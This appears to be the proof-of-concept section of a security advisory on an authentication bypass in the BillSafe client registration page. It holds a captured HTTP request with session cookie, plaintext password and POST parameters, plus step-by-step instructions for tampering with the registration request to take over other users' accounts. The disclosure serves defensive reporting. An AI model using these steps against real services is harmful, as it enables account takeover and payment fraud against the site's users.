Proof of Concept:
=================
The auth bypass vulnerability can be exploited by remote attackers without required user interaction or privileged application user account.
For demonstration or reproduce ...

Requirement(s):
				[+] Browser (Mozilla)
				[+] Tamper Data - Addon
				[+] A secound valid registration session change values


Registration(s):
http://client.billsafe.de/login/register/id/aa3a863357fe6acb0fe16f7cce1a46d135235

Host=client.billsafe.de
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
DNT=1
Connection=keep-alive
Referer=http://client.billsafe.de/login/first-login/
Cookie=__utma=22145316.759281629.1356643963.1356643963.1356653145.2; __utmc=22145316; 
__utmz=22145316.1356643963.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=billsafe%20paypal; 
PHPSESSID=mdkgkm8j91n4d57hdl8c9bjqo6; __utmb=22145316.96.9.1356654870355

Cache-Control=max-age=0
Content-Type=application/x-www-form-urlencoded
Content-Length=92

POSTDATA=clientId=35235&password=benjamin337&email=bkm%40vulnerability-lab.com&integration=prepared


Reference(s):
http://client.billsafe.de/login/first-login/


Manually steps to reproduce ...
1. Start your web browser and open up the billsafe website
2. Register an user account via the main registration form
3. Go to your postbox and copy the link with the session
4. Open the browser, start tamper data and load the request (mail link) of the login register id
5. The tamper will show you the plain context which can be changed to your own values
6. Hold the request and change the values to your own new email account or password
7. Reload the page, change to your own new password, load the mail
8. Registration successful. You can now login with the account details of any other user.